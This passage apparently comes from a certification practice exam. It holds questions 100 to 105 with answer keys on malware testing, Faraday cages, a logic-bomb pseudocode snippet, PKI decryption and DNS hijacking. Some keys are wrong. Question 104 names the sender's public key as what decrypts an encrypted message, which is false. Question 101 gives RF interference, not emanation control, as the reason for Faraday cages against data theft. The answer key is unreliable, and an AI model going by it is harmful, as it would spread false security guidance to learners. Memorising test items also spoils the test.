A security professional wants to test a piece of malware that was isolated on a user’s computer to document
its effect on a system. Which of the following is the FIRST step the security professional should take?
A. Create a sandbox on the machine.
B. Open the file and run it.
C. Create a secure baseline of the system state.
D. Harden the machine.

Answer 100

C. Create a secure baseline of the system state.

Question 101

In highly secure environments where the risk of malicious actors attempting to steal data is high, which of the
following is the BEST reason to deploy Faraday cages?
A. To provide emanation control to prevent credential harvesting
B. To minimize signal attenuation over distances to maximize signal strength
C. To minimize external RF interference with embedded processors
D. To protect the integrity of audit logs from malicious alteration

Answer 101

C. To minimize external RF interference with embedded processors

Question 102

Which of the following is the proper use of a Faraday cage?

A. To block electronic signals sent to erase a cell phone
B. To capture packets sent to a honeypot during an attack
C. To protect hard disks from access during a forensics investigation
D. To restrict access to a building allowing only one person to enter at a time

Answer 102

A. To block electronic signals sent to erase a cell phone

Question 103

A security administrator found the following piece of code referenced on a domain controller’s task scheduler:
$var = GetDomainAdmins
If $var != ‘fabio’
SetDomainAdmins = NULL
With which of the following types of malware is the code associated?
A. RAT
B. Backdoor
C. Logic bomb
D. Crypto-malware

Answer 103

C. Logic bomb

Question 104

An email recipient is unable to open a message encrypted through PKI that was sent from another
organization. Which of the following does the recipient need to decrypt the message?
A. The sender’s private key
B. The recipient’s private key
C. The recipient’s public key
D. The CA’s root certificate
E. The sender’s public key
F. An updated CRL

Answer 104

E. The sender’s public key

Question 105

An employee opens a web browser and types a URL into the address bar. Instead of reaching the requested
site, the browser opens a completely different site. Which of the following types of attacks have MOST likely
occurred? (Choose two.)
A. DNS hijacking
B. Cross-site scripting
C. Domain hijacking
D. Man-in-the-browser
E. Session hijacking

Answer 105

A. DNS hijacking
C. Domain hijacking